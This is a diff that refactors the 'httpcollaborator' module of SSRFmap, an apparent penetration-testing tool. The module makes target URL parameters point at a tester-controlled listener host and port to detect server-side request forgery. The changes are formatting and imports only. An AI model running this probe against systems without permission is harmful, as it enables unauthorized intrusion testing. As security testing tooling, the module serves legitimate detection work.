@@ -1,9 +1,10 @@
-from ssrfmap.core.utils import *
-from ssrfmap.core.handler import Handler
-import re
 import logging
+import re
 import urllib.parse
 
+from ssrfmap.core.handler import Handler
+from ssrfmap.core.utils import wrapper_http
+
 """
 Example:
 ```
@@ -15,12 +16,13 @@ Use ssh/autossh to established remote tunnel between public and localhost handle
 ```
 """
 
-name          = "httpcollaborator"
-description   = "This module act like burpsuite collaborator through http protocol to detect if target parameters are prone to ssrf"
-author        = "xyzkab"
-documentation = []
+name = "httpcollaborator"
+description = "This module act like burpsuite collaborator through http protocol to detect if target parameters are prone to ssrf"
+author = "xyzkab"
+documentation: list[str] = []
 
-class exploit():
+
+class exploit:
     SERVER_HOST = "127.0.0.1"
     SERVER_PORT = "4242"
 
@@ -28,16 +30,20 @@ class exploit():
         logging.info("Module '{}' launched !".format(name))
 
         # Handle args for httpcollaborator
-        if args.lhost == None: self.SERVER_HOST = input("Server Host:")
-        else:                  self.SERVER_HOST = args.lhost
+        if args.lhost == None:
+            self.SERVER_HOST = input("Server Host:")
+        else:
+            self.SERVER_HOST = args.lhost
 
-        if args.lport == None: self.SERVER_PORT = input("Server Port:")
-        else:                  self.SERVER_PORT = args.lport
+        if args.lport == None:
+            self.SERVER_PORT = input("Server Port:")
+        else:
+            self.SERVER_PORT = args.lport
 
         params = args.param.split(",")
         for param in params:
             logging.info("Testing PARAM: {}".format(param))
-            payload = wrapper_http("?{}".format(param), args.lhost, args.lport.strip() )
+            payload = wrapper_http("?{}".format(param), args.lhost, args.lport.strip())
             r = requester.do_request(param, payload)
 
         logging.info("Module '{}' finished !".format(name))
